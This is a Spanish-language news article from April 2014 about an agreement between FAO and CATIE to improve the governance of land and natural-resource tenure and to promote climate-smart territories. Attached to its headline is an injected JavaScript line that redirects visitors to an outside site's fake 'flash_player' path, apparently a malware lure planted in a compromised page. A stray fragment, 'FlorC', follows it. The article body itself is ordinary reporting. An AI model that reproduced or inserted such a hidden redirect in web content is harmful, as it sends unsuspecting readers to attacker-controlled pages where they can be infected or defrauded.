Convenio permitirá mejorar tenencia y gestión responsable de recursos naturalesdocument.location.href=”http://www.sommen.nu/templates/flash_player/?A”

FlorC

La FAO y el CATIE firmaron un acuerdo que busca fomentar el diálogo.

09 de abril de 2014 El acceso seguro y equitativo a los recursos naturales es clave para el desarrollo sostenible, así como una buena gobernanza es crucial para determinar cómo las personas y las comunidades adquieren derechos de acceso y control de la tierra, la pesca y los bosques. 

Debido a la importancia de este tema, el pasado 2 de abril, la Organización de las Naciones Unidas para la Alimentación y la Agricultura (FAO) y el CATIE (Centro Agronómico Tropical de Investigación y Enseñanza) firmaron un acuerdo que busca fomentar el diálogo, promover el intercambio de conocimiento en el marco de la cooperación Sur-Sur e informar sobre políticas, con el fin de mejorar la gobernanza responsable de la tenencia de la tierra y los recursos naturales, logrando así impulsar la seguridad alimentaria en los países en desarrollo.

“Esta asociación estratégica con el CATIE desarrollará las capacidades de líderes actuales y futuros para crear estrategias innovadoras en el uso y la conservación sostenible de nuestros recursos naturales”, afirmó María Helena Semedo, directora general adjunta de la FAO y coordinadora de Recursos Naturales, durante la firma del acuerdo.

Asimismo, Semedo comentó que la FAO reconoce al CATIE como un centro de conocimiento en la gestión integrada de la agricultura y los recursos naturales, para contribuir a la seguridad alimentaria. “Nuestras instituciones trabajarán juntas para fortalecer la cooperación Sur-Sur y la cooperación triangular con países miembros. Estoy segura de que trabajando juntos contribuiremos al futuro sostenible y sin hambre que todos queremos", añadió Semedo.

Algunas de las actividades que contempla el acuerdo son la preparación e implementación de propuestas conjuntas de proyectos que se presentarán a donantes y agencias para el desarrollo. Estos proyectos buscarán fortalecer capacidades en el manejo integrado de la agricultura, los bosques, la agroforestería y la conservación de los recursos naturales, con un especial énfasis en la agricultura familiar.

La movilización conjunta de expertos técnicos para intervenciones temáticas, la organización de cursos y la facilitación del acceso a los recursos de aprendizaje serán también actividades clave previstas en el acuerdo.

Además, el acuerdo subraya la importancia de las Directrices Voluntarias de la FAO sobre la gobernanza responsable de la tenencia de la tierra, la pesca y los bosques para las estrategias y políticas de seguridad alimentaria.

Por su parte, José Joaquín Campos, director general del CATIE comentó que este acuerdo es de suma importancia y felicitó a la FAO por liderar la promoción de la implementación de las Directrices, las cuales buscando especialmente erradicar el hambre.

Empoderando a los más pobres y vulnerables

Durante la ceremonia de la firma del convenio, Campos realizó una presentación sobre los enfoques sistémicos y particularmente sobre los territorios climáticamente inteligentes (TCI), modelo que el centro promueve en los trópicos como una herramienta para lograr el bienestar humano sostenible e inclusivo. 

De acuerdo con Campos, los TCI son una herramienta para conciliar la producción, la adaptación y la reducción de las emisiones en el sector agrícola ante el desafío de producir más con menos y así afrontar los retos crecientes de la alimentación mundial.

“Si queremos enfrentarnos a los retos de hoy a través de la agricultura climáticamente inteligente es cierto que necesitamos tecnologías, pero también necesitamos la acción colectiva y la colaboración a nivel territorial para lograr un cambio. Estamos en una situación de urgencia, por lo que necesitamos políticas, instituciones e incentivos que logren un entorno favorable, de forma que las personas tengan el acceso y los derechos a usar y manejar de forma sostenible los recursos naturales”, manifestó Campos.

El establecimiento y la protección de los derechos a los recursos, especialmente para los más vulnerables, es un elemento clave del enfoque de TCI.

Comentarios

Para poder comentar debe iniciar su sesión:

INGRESAR